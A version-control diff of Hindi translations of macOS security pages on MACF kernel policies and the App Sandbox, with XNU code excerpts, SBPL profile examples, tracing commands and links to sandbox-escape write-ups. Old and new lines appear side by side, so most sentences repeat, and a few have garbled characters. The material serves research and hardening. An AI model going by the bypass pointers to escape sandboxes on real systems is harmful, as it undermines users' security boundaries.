एक कर्नेल एक्सटेंशन `mac_policy_conf` संरचना को कॉन्फ़िगर कर सकता है और फिर इसे `mac_policy_register` कॉल करके पंजीकृत कर सकता है। [यहाँ](https://opensource.apple.com/source/xnu/xnu-2050.18.24/security/mac_policy.h.auto.html) से:
```c
@ -67,9 +67,9 @@ void *mpc_data; /** module data */
```
कर्नेल एक्सटेंशन को पहचानना जो इन नीतियों को कॉन्फ़िगर करते हैं, `mac_policy_register` कॉल की जांच करके आसान है। इसके अलावा, एक्सटेंशन के डिस्सेम्बल की जांच करने पर `mac_policy_conf` स्ट्रक्चर भी पाया जा सकता है।
ध्यान दें कि MACF नीतियों को **डायनामिकली** भी पंजीकृत और अपंजीकृत किया जा सकता है।
ध्यान दें कि MACF नीतियों को **गतिशील** रूप से भी पंजीकृत और अपंजीकृत किया जा सकता है।
`mac_policy_conf` के मुख्य क्षेत्रों में से एक **`mpc_ops`** है। यह क्षेत्र निर्दिष्ट करता है कि नीति किन ऑपरेशनों में रुचि रखती है। ध्यान दें कि इनमें सैकड़ों हैं, इसलिए सभी को शून्य करना और फिर केवल उन पर ध्यान केंद्रित करना संभव है जिनमें नीति रुचि रखती है। [यहां](https://opensource.apple.com/source/xnu/xnu-2050.18.24/security/mac_policy.h.auto.html) से:
`mac_policy_conf` के मुख्य क्षेत्रों में से एक **`mpc_ops`** है। यह क्षेत्र निर्दिष्ट करता है कि नीति किन ऑपरेशनों में रुचि रखती है। ध्यान दें कि इनमें सैकड़ों हैं, इसलिए सभी को शून्य करना संभव है और फिर केवल उन पर ध्यान केंद्रित करना जो नीति में रुचि रखते हैं। [यहां](https://opensource.apple.com/source/xnu/xnu-2050.18.24/security/mac_policy.h.auto.html) से:
```c
struct mac_policy_ops {
mpo_audit_check_postselect_t *mpo_audit_check_postselect;
@ -82,7 +82,45 @@ mpo_cred_check_label_update_execve_t *mpo_cred_check_label_update_execve;
mpo_cred_check_label_update_t *mpo_cred_check_label_update;
[...]
```
लगभग सभी हुक्स को MACF द्वारा कॉल बै
लगभग सभी हुक्स को MACF द्वारा कॉल बैक किया जाएगा जब इनमें से कोई एक ऑपरेशन इंटरसेप्ट किया जाता है। हालांकि, **`mpo_policy_*`** हुक एक अपवाद हैं क्योंकि `mpo_hook_policy_init()` एक कॉल बैक है जो पंजीकरण पर कॉल किया जाता है (तो `mac_policy_register()` के बाद) और `mpo_hook_policy_initbsd()` लेट पंजीकरण के दौरान कॉल किया जाता है जब BSD सबसिस्टम सही तरीके से प्रारंभ हो चुका होता है।
इसके अलावा, **`mpo_policy_syscall`** हुक को किसी भी kext द्वारा पंजीकृत किया जा सकता है ताकि एक निजी **ioctl** शैली कॉल **इंटरफेस** को उजागर किया जा सके। फिर, एक उपयोगकर्ता क्लाइंट `mac_syscall` (#381) को कॉल कर सकेगा जिसमें **पॉलिसी नाम** के रूप में एक पूर्णांक **कोड** और वैकल्पिक **आर्गुमेंट्स** निर्दिष्ट किए जाएंगे।\
उदाहरण के लिए, **`Sandbox.kext`** इसका बहुत उपयोग करता है।
kext के **`__DATA.__const*`** की जांच करके `mac_policy_ops` संरचना की पहचान करना संभव है जो पॉलिसी को पंजीकृत करते समय उपयोग की जाती है। इसे खोजना संभव है क्योंकि इसका पॉइंटर `mpo_policy_conf` के अंदर एक ऑफसेट पर है और साथ ही उस क्षेत्र में NULL पॉइंटर्स की मात्रा के कारण भी।
इसके अलावा, यह भी संभव है कि उन kexts की सूची प्राप्त की जाए जिन्होंने एक पॉलिसी को कॉन्फ़िगर किया है, जो कि मेमोरी से संरचना **`_mac_policy_list`** को डंप करके अपडेट की जाती है।
## MACF Initialization
MACF बहुत जल्दी प्रारंभ होता है। इसे XNU के `bootstrap_thread` में सेट किया जाता है: `ipc_bootstrap` के बाद `mac_policy_init()` को कॉल किया जाता है जो `mac_policy_list` को प्रारंभ करता है और कुछ क्षणों बाद `mac_policy_initmach()` को कॉल किया जाता है। अन्य चीजों के बीच, यह फ़ंक्शन सभी Apple kexts को प्राप्त करेगा जिनकी Info.plist में `AppleSecurityExtension` कुंजी है जैसे `ALF.kext`, `AppleMobileFileIntegrity.kext`, `Quarantine.kext`, `Sandbox.kext` और `TMSafetyNet.kext` और उन्हें लोड करता है।
## MACF Callouts
कोड में **`#if CONFIG_MAC`** कंडीशनल ब्लॉक्स जैसे MACF के लिए कॉलआउट्स मिलना सामान्य है। इसके अलावा, इन ब्लॉक्स के अंदर `mac_proc_check*` को कॉल करना संभव है जो MACF को **अनुमतियों की जांच** करने के लिए कॉल करता है ताकि कुछ क्रियाएँ की जा सकें। इसके अलावा, MACF कॉलआउट्स का प्रारूप है: **`mac_<object>_<opType>_opName`**।
ऑब्जेक्ट निम्नलिखित में से एक है: `bpfdesc`, `cred`, `file`, `proc`, `vnode`, `mount`, `devfs`, `ifnet`, `inpcb`, `mbuf`, `ipq`, `pipe`, `sysv[msg/msq/shm/sem]`, `posix[shm/sem]`, `socket`, `kext`।\
`opType` आमतौर पर चेक होता है जिसका उपयोग क्रिया को अनुमति देने या अस्वीकार करने के लिए किया जाएगा। हालांकि, `notify` भी मिल सकता है, जो kext को दी गई क्रिया पर प्रतिक्रिया करने की अनुमति देगा।
आप एक उदाहरण [https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/bsd/kern/kern_mman.c#L621](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/bsd/kern/kern_mman.c#L621) में पा सकते हैं:
<pre class="language-c"><code class="lang-c">int
mmap(proc_t p, struct mmap_args *uap, user_addr_t *retval)
{
[...]
#if CONFIG_MACF
<strong> error = mac_file_check_mmap(vfs_context_ucred(ctx),
</strong> fp->fp_glob, prot, flags, file_pos + pageoff,
&#x26;maxprot);
if (error) {
(void)vnode_put(vp);
goto bad;
}
#endif /* MAC */
[...]
</code></pre>
फिर, आप `mac_file_check_mmap` का कोड [https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/security/mac_file.c#L174](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/security/mac_file.c#L174) में पा सकते हैं।
```c
mac_file_check_mmap(struct ucred *cred, struct fileglob *fg, int prot,
int flags, uint64_t offset, int *maxprot)
@ -128,10 +166,10 @@ error = mac_error_select(__step_err, error); \
> /*
> * MAC_GRANT निर्दिष्ट जांच को नीति
> * मॉड्यूल सूची के माध्यम से चलाकर और प्रत्येक के साथ यह जांचकर करता है कि
> * यह अनुरोध के बारे में कैसा महसूस करता है। MAC_CHECK के विपरीत,
> * यह अनुरोध के बारे में कैसा महसूस करता है। MAC_CHECK के विपरीत,
> * यह यदि कोई नीतियाँ '0' लौटाती हैं तो प्रदान करता है,
> * और अन्यथा EPERM लौटाता है। ध्यान दें कि यह अपने मान को
> * 'त्रुटि' के माध्यम से कॉलर के दायरे में लौटाता है।
> * और अन्यथा EPERM लौटाता है। ध्यान दें कि यह अपने मान को
> * कॉलर के दायरे में 'त्रुटि' के माध्यम से लौटाता है।
> */
> #define MAC_GRANT(check, args...) do { \
> error = EPERM; \
@ -166,7 +204,7 @@ goto skip_syscall;
}
#endif /* CONFIG_MACF */
```
कॉलिंग प्रोसेस **बिटमास्क** में यह जांच करेगा कि वर्तमान syscall को `mac_proc_check_syscall_unix` कॉल करना चाहिए या नहीं। इसका कारण यह है कि syscalls इतनी बार कॉल किए जाते हैं कि हर बार `mac_proc_check_syscall_unix` को कॉल करने से बचना दिलचस्प है।
कॉलिंग प्रोसेस **बिटमास्क** में यह जांच करेगा कि वर्तमान syscall को `mac_proc_check_syscall_unix`ो कॉल करना चाहिए या नहीं। इसका कारण यह है कि syscalls इतनी बार कॉल किए जाते हैं कि हर बार `mac_proc_check_syscall_unix` को कॉल करने से बचना दिलचस्प है।
ध्यान दें कि फ़ंक्शन `proc_set_syscall_filter_mask()` जो एक प्रक्रिया में बिटमास्क syscalls सेट करता है, Sandbox द्वारा सैंडबॉक्स किए गए प्रक्रियाओं पर मास्क सेट करने के लिए कॉल किया जाता है।

50
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
View File

@ -6,7 +6,7 @@
MacOS Sandbox (शुरुआत में Seatbelt कहा जाता था) **ऐप्लिकेशनों को सीमित करता है** जो सैंडबॉक्स के अंदर चल रही हैं **सैंडबॉक्स प्रोफ़ाइल में निर्दिष्ट अनुमत क्रियाओं** तक। यह सुनिश्चित करने में मदद करता है कि **ऐप्लिकेशन केवल अपेक्षित संसाधनों तक पहुंच प्राप्त करेगा**
कोई भी ऐप जिसमें **अधिकार** **`com.apple.security.app-sandbox`** है, सैंडबॉक्स के अंदर निष्पादित किया जाएगा। **एप्पल बाइनरीज़** आमतौर पर सैंडबॉक्स के अंदर निष्पादित होती हैं, और **ऐप स्टोर** से सभी ऐप्लिकेशनों के पास वह अधिकार होता है। इसलिए कई ऐप्लिकेशन सैंडबॉक्स के अंदर निष्पादित किए जाएंगे।
कोई भी ऐप जिसमें **अधिकार** **`com.apple.security.app-sandbox`** है, सैंडबॉक्स के अंदर निष्पादित होगा। **एप्पल बाइनरी** आमतौर पर सैंडबॉक्स के अंदर निष्पादित होती हैं, और **ऐप स्टोर** से सभी ऐप्लिकेशनों के पास वह अधिकार होता है। इसलिए कई ऐप्लिकेशन सैंडबॉक्स के अंदर निष्पादित होंगे।
यह नियंत्रित करने के लिए कि एक प्रक्रिया क्या कर सकती है या नहीं, **सैंडबॉक्स में लगभग किसी भी ऑपरेशन में हुक होते हैं** जो एक प्रक्रिया कोशिश कर सकती है (अधिकांश syscalls सहित) **MACF** का उपयोग करते हुए। हालाँकि, ऐप के **अधिकारों** के आधार पर सैंडबॉक्स प्रक्रिया के साथ अधिक उदार हो सकता है।
@ -14,7 +14,7 @@ MacOS Sandbox (शुरुआत में Seatbelt कहा जाता थ
- **कर्नेल एक्सटेंशन** `/System/Library/Extensions/Sandbox.kext`
- **निजी ढांचा** `/System/Library/PrivateFrameworks/AppSandbox.framework`
- उपयोगकर्ता भूमि में चलने वाला एक **डेमन** `/usr/libexec/sandboxd`
- एक **डेमन** जो उपयोगकर्ता भूमि में चल रहा है `/usr/libexec/sandboxd`
- **कंटेनर** `~/Library/Containers`
### Containers
@ -54,7 +54,7 @@ drwx------ 2 username staff 64 Mar 24 18:02 SystemData
drwx------ 2 username staff 64 Mar 24 18:02 tmp
```
> [!CAUTION]
> ध्यान दें कि भले ही symlinks "Sandbox" से "escape" करने और अन्य फ़ोल्डरों तक पहुँचने के लिए वहाँ हैं, ऐप को अभी भी **अनुमतियाँ** होनी चाहिए ताकि वह उन्हें एक्सेस कर सके। ये अनुमतियाँ **`.plist`** में `RedirectablePaths` के अंदर हैं।
> ध्यान दें कि भले ही symlinks "Sandbox" से "escape" करने और अन्य फ़ोल्डरों तक पहुँचने के लिए वहाँ हैं, ऐप को अभी भी **अनुमतियाँ** होनी चाहिए ताकि वह उन्हें एक्सेस कर सके। ये अनुमतियाँ **`.plist`** के अंदर `RedirectablePaths` में हैं।
**`SandboxProfileData`** संकलित सैंडबॉक्स प्रोफ़ाइल CFData है जिसे B64 में escaped किया गया है।
```bash
@ -106,13 +106,13 @@ AAAhAboBAAAAAAgAAABZAO4B5AHjBMkEQAUPBSsGPwsgASABHgEgASABHwEf...
[...]
```
> [!WARNING]
> एक Sandboxed एप्लिकेशन द्वारा बनाई गई/संशोधित की गई हर चीज़ को **quarantine attribute** मिलेगा। यदि सैंडबॉक्स ऐप कुछ **`open`** के साथ निष्पादित करने की कोशिश करता है, तो यह Gatekeeper को ट्रिगर करके एक सैंडबॉक्स स्थान को रोक देगा।
> एक Sandboxed एप्लिकेशन द्वारा बनाई गई/संशोधित हर चीज़ को **quarantine attribut**e मिलेगा। यदि सैंडबॉक्स ऐप कुछ **`open`** के साथ निष्पादित करने की कोशिश करता है, तो यह Gatekeeper को ट्रिगर करके एक सैंडबॉक्स स्पेस को रोक देगा।
## Sandbox Profiles
Sandbox प्रोफाइल कॉन्फ़िगरेशन फ़ाइलें हैं जो यह संकेत देती हैं कि उस **Sandbox** में क्या **अनुमति/प्रतिबंधित** होगा। यह **Sandbox Profile Language (SBPL)** का उपयोग करता है, जो [**Scheme**](<https://en.wikipedia.org/wiki/Scheme_(programming_language)>) प्रोग्रामिंग भाषा का उपयोग करता है।
यहाँ आप एक उदाहरण पा सकते है:
यहाँ एक उदाहरण है:
```scheme
(version 1) ; First you get the version
@ -131,7 +131,7 @@ Sandbox प्रोफाइल कॉन्फ़िगरेशन फ़ा
)
```
> [!TIP]
> इस [**शोध**](https://reverse.put.as/2011/09/14/apple-sandbox-guide-v1-0/) **को देखें ताकि अधिक क्रियाएँ जो अनुमति दी जा सकती हैं या अस्वीकृत की जा सकती हैं, की जांच की जा सके।**
> इस [**शोध**](https://reverse.put.as/2011/09/14/apple-sandbox-guide-v1-0/) **को अधिक क्रियाओं की जांच करने के लिए देखें जो अनुमति दी जा सकती हैं या अस्वीकृत की जा सकती हैं।**
>
> ध्यान दें कि एक प्रोफ़ाइल के संकलित संस्करण में संचालन के नाम को एक ऐरे में उनके प्रविष्टियों द्वारा प्रतिस्थापित किया जाता है जिसे dylib और kext द्वारा जाना जाता है, जिससे संकलित संस्करण छोटा और पढ़ने में अधिक कठिन हो जाता है।
@ -139,7 +139,7 @@ Sandbox प्रोफाइल कॉन्फ़िगरेशन फ़ा
- **`/usr/share/sandbox`**
- **`/System/Library/Sandbox/Profiles`**
- अन्य सैंडबॉक्स प्रोफाइल की जांच [https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles) पर की जा सकती है।
- अन्य सैंडबॉक्स प्रोफाइल की जांच [https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles) में की जा सकती है।
**ऐप स्टोर** ऐप्स **प्रोफ़ाइल** **`/System/Library/Sandbox/Profiles/application.sb`** का उपयोग करते हैं। आप इस प्रोफ़ाइल में देख सकते हैं कि कैसे अधिकार जैसे **`com.apple.security.network.server`** एक प्रक्रिया को नेटवर्क का उपयोग करने की अनुमति देते हैं।
@ -205,13 +205,13 @@ log show --style syslog --predicate 'eventMessage contains[c] "sandbox"' --last
बायपास के उदाहरण:
- [https://lapcatsoftware.com/articles/sandbox-escape.html](https://lapcatsoftware.com/articles/sandbox-escape.html)
- [https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c) (वे `~$` से शुरू होने वाले नाम के साथ सैंडबॉक्स के बाहर फ़ाइलें लिखने में सक्षम हैं)।
- [https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c) (वे सैंडबॉक्स के बाहर ऐसे फ़ाइलें लिखने में सक्षम हैं जिनका नाम `~$` से शुरू होता है)।
### सैंडबॉक्स ट्रेसिंग
#### प्रोफ़ाइल के माध्यम से
यह संभव है कि हर बार जब कोई क्रिया ी जाती है, तो सैंडबॉक्स द्वारा किए गए सभी चेक को ट्रेस किया जा सके। इसके लिए बस निम्नलिखित प्रोफ़ाइल बनाएं:
यह संभव है कि हर बार जब कोई क्रिया जांची जाती है, तो सैंडबॉक्स द्वारा किए गए सभी चेक को ट्रेस किया जा सके। इसके लिए बस निम्नलिखित प्रोफ़ाइल बनाएं:
```scheme:trace.sb
(version 1)
(trace /tmp/trace.out)
@ -220,18 +220,18 @@ log show --style syslog --predicate 'eventMessage contains[c] "sandbox"' --last
```bash
sandbox-exec -f /tmp/trace.sb /bin/ls
```
`/tmp/trace.out` में आप देख सकेंगे कि हर बार इसे कॉल करने पर प्रत्येक सैंडबॉक्स चेक कैसे किया गया (तो, बहुत सारे डुप्लिकेट हैं)।
`/tmp/trace.out` में आप देख सकेंगे कि हर बार इसे कॉल करने पर प्रत्येक सैंडबॉक्स चेक कैसे किया गया (तो, बहुत सारे डुप्लिकेट)।
सैंडबॉक्स को **`-t`** पैरामीटर का उपयोग करके ट्रेस करना भी संभव है: `sandbox-exec -t /path/trace.out -p "(version 1)" /bin/ls`
**`-t`** पैरामीटर का उपयोग करके सैंडबॉक्स को ट्रेस करना भी संभव है: `sandbox-exec -t /path/trace.out -p "(version 1)" /bin/ls`
#### API के माध्यम से
`libsystem_sandbox.dylib` द्वारा निर्यातित `sandbox_set_trace_path` फ़ंक्शन एक ट्रेस फ़ाइल नाम निर्दिष्ट करने की अनुमति देता है जहाँ सैंडबॉक्स चेक लिखे जाएंगे।\
यह `sandbox_vtrace_enable()` को कॉल करके कुछ समान करना भी संभव है और फिर बफर से लॉग त्रुटियों को प्राप्त करना `sandbox_vtrace_report()` को कॉल करके।
यह `sandbox_vtrace_enable()` को कॉल करके कुछ समान करना भी संभव है और फिर `sandbox_vtrace_report()` को कॉल करके बफर से लॉग त्रुटि प्राप्त करना
### सैंडबॉक्स निरीक्षण
`libsandbox.dylib` एक फ़ंक्शन निर्यात करता है जिसे sandbox_inspect_pid कहा जाता है जो एक प्रक्रिया की सैंडबॉक्स स्थिति की सूची देता है (विस्तार सहित)। हालाँकि, केवल प्लेटफ़ॉर्म बाइनरी इस फ़ंक्शन का उपयोग कर सकते हैं।
`libsandbox.dylib` एक फ़ंक्शन निर्यात करता है जिसे sandbox_inspect_pid कहा जाता है जो एक प्रक्रिया की सैंडबॉक्स स्थिति की सूची देता है (जिसमें एक्सटेंशन शामिल हैं)। हालाँकि, केवल प्लेटफ़ॉर्म बाइनरी इस फ़ंक्शन का उपयोग कर सकते हैं।
### MacOS और iOS सैंडबॉक्स प्रोफाइल
@ -239,11 +239,11 @@ MacOS सिस्टम सैंडबॉक्स प्रोफाइल
और यदि कोई तृतीय-पक्ष एप्लिकेशन _**com.apple.security.app-sandbox**_ अधिकार लेता है, तो सिस्टम उस प्रक्रिया पर **/System/Library/Sandbox/Profiles/application.sb** प्रोफाइल लागू करता है।
iOS में, डिफ़ॉल्ट प्रोफाइल को **container** कहा जाता है और हमारे पास SBPL पाठ प्रतिनिधित्व नहीं है। मेमोरी में, इस सैंडबॉक्स को सैंडबॉक्स से प्रत्येक अनुमति के लिए अनुमति/निषेध बाइनरी ट्री के रूप में दर्शाया गया है।
iOS में, डिफ़ॉल्ट प्रोफाइल को **container** कहा जाता है और हमारे पास SBPL पाठ प्रतिनिधित्व नहीं है। मेमोरी में, इस सैंडबॉक्स को सैंडबॉक्स से प्रत्येक अनुमति के लिए Allow/Deny बाइनरी ट्री के रूप में दर्शाया गया है।
### ऐप स्टोर ऐप्स में कस्टम SBPL
कंपनियों के लिए यह संभव हो सकता है कि वे अपने ऐप्स को **कस्टम सैंडबॉक्स प्रोफाइल** के साथ चलाएँ (डिफ़ॉल्ट के बजाय)। उन्हें अधिकार **`com.apple.security.temporary-exception.sbpl`** का उपयोग करना होगा जिसे Apple द्वारा अधिकृत किया जाना चाहिए।
कंपनियों के लिए अपने ऐप्स को **कस्टम सैंडबॉक्स प्रोफाइल** के साथ चलाना संभव हो सकता है (डिफ़ॉल्ट के बजाय)। उन्हें अधिकार **`com.apple.security.temporary-exception.sbpl`** का उपयोग करना होगा जिसे Apple द्वारा अधिकृत किया जाना चाहिए।
इस अधिकार की परिभाषा की जांच करना संभव है **`/System/Library/Sandbox/Profiles/application.sb:`**
```scheme
@ -259,15 +259,15 @@ iOS में, डिफ़ॉल्ट प्रोफाइल को **contai
**`sandbox-exec`** टूल `libsandbox.dylib` से `sandbox_compile_*` फ़ंक्शंस का उपयोग करता है। मुख्य निर्यातित फ़ंक्शंस हैं: `sandbox_compile_file` (एक फ़ाइल पथ की अपेक्षा करता है, पैरामीटर `-f`), `sandbox_compile_string` (एक स्ट्रिंग की अपेक्षा करता है, पैरामीटर `-p`), `sandbox_compile_name` (एक कंटेनर का नाम अपेक्षित है, पैरामीटर `-n`), `sandbox_compile_entitlements` (अधिकार plist की अपेक्षा करता है)।
इसका उलटा और [**टूल sandbox-exec का ओपन-सोर्स संस्करण**](https://newosxbook.com/src.jl?tree=listings&file=/sandbox_exec.c) **`sandbox-exec`** को संकलित Sandbox प्रोफ़ाइल को एक फ़ाइल में लिखने की अनुमति देता है।
इस उलटे और [**ओपन सोर्स संस्करण टूल sandbox-exec**](https://newosxbook.com/src.jl?tree=listings&file=/sandbox_exec.c) को **`sandbox-exec`** को संकलित Sandbox प्रोफ़ाइल को फ़ाइल में लिखने की अनुमति देता है।
इसके अलावा, एक प्रक्रिया को एक कंटेनर के अंदर सीमित करने के लिए यह `sandbox_spawnattrs_set[container/profilename]` को कॉल कर सकता है और एक कंटेनर या पूर्व-निर्मित प्रोफ़ाइल पास कर सकता है।
## Sandbox को डिबग और बायपास करना
macOS पर, iOS के विपरीत जहां प्रक्रियाएँ शुरू से ही कर्नेल द्वारा Sandbox की जाती हैं, **प्रक्रियाओं को स्वयं Sandbox में शामिल होना चाहिए**। इसका मतलब है कि macOS पर, एक प्रक्रिया Sandbox द्वारा प्रतिबंधित नहीं होती है जब तक कि वह सक्रिय रूप से इसमें प्रवेश करने का निर्णय नहीं लेती, हालांकि App Store ऐप्स हमेशा Sandbox में होते हैं।
macOS पर, iOS के विपरीत जहां प्रक्रियाएँ शुरू से ही कर्नेल द्वारा Sandbox की गई होती हैं, **प्रक्रियाओं को स्वयं Sandbox में शामिल होना चाहिए**। इसका मतलब है कि macOS पर, एक प्रक्रिया Sandbox द्वारा प्रतिबंधित नहीं होती है जब तक कि वह सक्रिय रूप से इसमें प्रवेश करने का निर्णय नहीं लेती, हालांकि App Store ऐप्स हमेशा Sandbox में होते हैं।
यदि प्रक्रियाओं के पास अधिकार है: `com.apple.security.app-sandbox`, तो वे उपयोगकर्ता भूमि से स्वचालित रूप से Sandbox की जाती हैं जब वे शुरू होती हैं। इस प्रक्रिया के विस्तृत विवरण के लिए देखें:
यदि प्रक्रियाओं के पास अधिकार है: `com.apple.security.app-sandbox`, तो वे उपयोगकर्ता भूमि से स्वचालित रूप से Sandbox में होती हैं जब वे शुरू होती हैं। इस प्रक्रिया के विस्तृत विवरण के लिए देखें:
{{#ref}}
macos-sandbox-debug-and-bypass/
@ -294,9 +294,9 @@ macos-sandbox-debug-and-bypass/
### **PID विशेषाधिकार की जाँच करें**
[**इसके अनुसार**](https://www.youtube.com/watch?v=mG715HcDgO8&t=3011s), **`sandbox_check`** फ़ंक्शंस (यह एक `__mac_syscall` है), यह जाँच कर सकते हैं **क्या एक ऑपरेशन को एक निश्चित PID, ऑडिट टोकन या अद्वितीय ID द्वारा Sandbox में अनुमति दी गई है या नहीं**।
[**इसके अनुसार**](https://www.youtube.com/watch?v=mG715HcDgO8&t=3011s), **`sandbox_check`** फ़ंक्शंस (यह एक `__mac_syscall` है), यह जाँच कर सकते हैं **कि क्या एक ऑपरेशन को एक निश्चित PID, ऑडिट टोकन या अद्वितीय ID द्वारा Sandbox में अनुमति दी गई है या नहीं**।
[**टूल sbtool**](http://newosxbook.com/src.jl?tree=listings&file=sbtool.c) (इसे [यहाँ संकलित किया गया है](https://newosxbook.com/articles/hitsb.html)) यह जाँच कर सकता है कि क्या एक PID कुछ कार्य कर सकता है:
[**टूल sbtool**](http://newosxbook.com/src.jl?tree=listings&file=sbtool.c) (इसे [यहाँ संकलित किया गया है](https://newosxbook.com/articles/hitsb.html)) यह जाँच कर सकता है कि क्या एक PID कुछ निश्चित क्रिाएँ कर सकता है:
```bash
sbtool <pid> mach #Check mac-ports (got from launchd with an api)
sbtool <pid> file /tmp #Check file access
@ -350,7 +350,7 @@ sbtool <pid> all
## Sandbox.kext
ध्यान दें कि iOS में कर्नेल एक्सटेंशन में **सभी प्रोफाइल हार्डकोडेड** होती हैं जो `__TEXT.__const` खंड के भीतर होती हैं ताकि उन्हें संशोधित नहीं किया जा सके। कर्नेल एक्सटेंशन से कुछ दिलचस्प फ़ंक्शंस निम्नलिखित हैं:
ध्यान दें कि iOS में कर्नेल एक्सटेंशन में **सभी प्रोफाइल हार्डकोडेड** होते हैं जो `__TEXT.__const` खंड के भीतर होते हैं ताकि उन्हें संशोधित नहीं किया जा सके। कर्नेल एक्सटेंशन से कुछ दिलचस्प फ़ंक्शंस निम्नलिखित हैं:
- **`hook_policy_init`**: यह `mpo_policy_init` को हुक करता है और इसे `mac_policy_register` के बाद कॉल किया जाता है। यह सैंडबॉक्स के अधिकांश प्रारंभिककरण करता है। यह SIP को भी प्रारंभ करता है।
- **`hook_policy_initbsd`**: यह `security.mac.sandbox.sentinel`, `security.mac.sandbox.audio_active` और `security.mac.sandbox.debug_mode` को पंजीकृत करते हुए sysctl इंटरफ़ेस सेट करता है (यदि `PE_i_can_has_debugger` के साथ बूट किया गया हो)।
@ -358,15 +358,15 @@ sbtool <pid> all
### MACF Hooks
**`Sandbox.kext`** MACF के माध्यम से एक सौ से अधिक हुक का उपयोग करता है। अधिकांश हुक कुछ तुच्छ मामलों की जांच करेंगे जो कार्रवाई करने की अनुमति देते हैं, यदि नहीं, तो वे **`cred_sb_evalutate`** को MACF से **क्रेडेंशियल्स** और एक संख्या के साथ कॉल करेंगे जो **ऑपरेशन** को करने के लिए है और एक **बफर** आउटपुट के लिए।
**`Sandbox.kext`** MACF के माध्यम से एक सौ से अधिक हुक का उपयोग करता है। अधिकांश हुक कुछ तुच्छ मामलों की जांच करेंगे जो कार्रवाई करने की अनुमति देते हैं, यदि नहीं, तो वे **`cred_sb_evalutate`** को MACF से **क्रेडेंशियल्स** और एक संख्या के साथ कॉल करेंगे जो **ऑपरेशन** को करने के लिए है और एक **बफर** आउटपुट के लिए है
इसका एक अच्छा उदाहरण फ़ंक्शन **`_mpo_file_check_mmap`** है जो **`mmap`** को हुक करता है और यह जांचना शुरू करेगा कि नई मेमोरी लिखने योग्य होने जा रही है (और यदि नहीं तो निष्पादन की अनुमति नहीं देगा), फिर यह जांचेगा कि क्या इसका उपयोग dyld साझा कैश के लिए किया जा रहा है और यदि हां तो निष्पादन की अनुमति देगा, और अंततः यह **`sb_evaluate_internal`** (या इसके किसी लपेटन) को आगे की अनुमति जांच करने के लिए कॉल करेगा।
इसका एक अच्छा उदाहरण फ़ंक्शन **`_mpo_file_check_mmap`** है जो **`mmap`** को हुक करता है और यह जांचना शुरू करेगा कि क्या नई मेमोरी लिखने योग्य होने जा रही है (और यदि नहीं तो निष्पादन की अनुमति नहीं देगा), फिर यह जांचेगा कि क्या इसका उपयोग dyld साझा कैश के लिए किया जा रहा है और यदि हां तो निष्पादन की अनुमति देगा, और अंततः यह **`sb_evaluate_internal`** (या इसके लपेटनों में से एक) को आगे की अनुमति जांच करने के लिए कॉल करेगा।
इसके अलावा, सैंडबॉक्स द्वारा उपयोग किए जाने वाले सौ(ओं) हुक में से, विशेष रूप से 3 बहुत दिलचस्प हैं:
इसके अलावा, सैंडबॉक्स द्वारा उपयोग किए जाने वाले सौ(ओं) हुक में से, 3 विशेष रूप से बहुत दिलचस्प हैं:
- `mpo_proc_check_for`: यदि आवश्यक हो तो प्रोफ़ाइल लागू करता है और यदि इसे पहले लागू नहीं किया गया था।
- `mpo_vnode_check_exec`: जब एक प्रक्रिया संबंधित बाइनरी को लोड करती है, तो एक प्रोफ़ाइल जांच की जाती है और SUID/SGID निष्पादनों को प्रतिबंधित करने की भी जांच की जाती है।
- `mpo_cred_label_update_execve`: इसे तब कॉल किया जाता है जब लेबल असाइन किया जाता है। यह सबसे लंबा होता है क्योंकि इसे तब कॉल किया जाता है जब बाइनरी पूरी तरह से लोड हो जाती है लेकिन अभी तक निष्पादित नहीं होती है। यह सैंडबॉक्स ऑब्जेक्ट बनाने, kauth क्रेडेंशियल्स से सैंडबॉक्स संरचना संलग्न करने, mach पोर्ट्स तक पहुंच को हटाने जैसी क्रियाएँ करेगा...
- `mpo_cred_label_update_execve`: यह तब कॉल किया जाता है जब लेबल असाइन किया जाता है। यह सबसे लंबा होता है क्योंकि इसे तब कॉल किया जाता है जब बाइनरी पूरी तरह से लोड हो जाती है लेकिन अभी तक निष्पादित नहीं हुई है। यह सैंडबॉक्स ऑब्जेक्ट बनाने, kauth क्रेडेंशियल्स के लिए सैंडबॉक्स संरचना संलग्न करने, mach पोर्ट्स तक पहुंच को हटाने जैसी क्रियाएँ करेगा...
ध्यान दें कि **`_cred_sb_evalutate`** **`sb_evaluate_internal`** का एक लपेटन है और यह फ़ंक्शन पास किए गए क्रेडेंशियल्स को प्राप्त करता है और फिर **`eval`** फ़ंक्शन का उपयोग करके मूल्यांकन करता है जो आमतौर पर **प्लेटफ़ॉर्म प्रोफ़ाइल** का मूल्यांकन करता है जो डिफ़ॉल्ट रूप से सभी प्रक्रियाओं पर लागू होता है और फिर **विशिष्ट प्रक्रिया प्रोफ़ाइल**। ध्यान दें कि प्लेटफ़ॉर्म प्रोफ़ाइल macOS में **SIP** के मुख्य घटकों में से एक है।

28
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
View File

@ -10,7 +10,7 @@
कंपाइलर `/usr/lib/libSystem.B.dylib` को बाइनरी से लिंक करेगा।
फिर, **`libSystem.B`** अन्य कई फ़ंक्शनों को कॉल करेगा जब तक कि **`xpc_pipe_routine`** ऐप के अधिकारों को **`securityd`** को नहीं भेजता। Securityd यह जांचता है कि क्या प्रक्रिया को सैंडबॉक्स के अंदर क्वारंटाइन किया जाना चाहिए, और यदि हां, तो इसे क्वारंटाइन कर दिया जाएगा।\
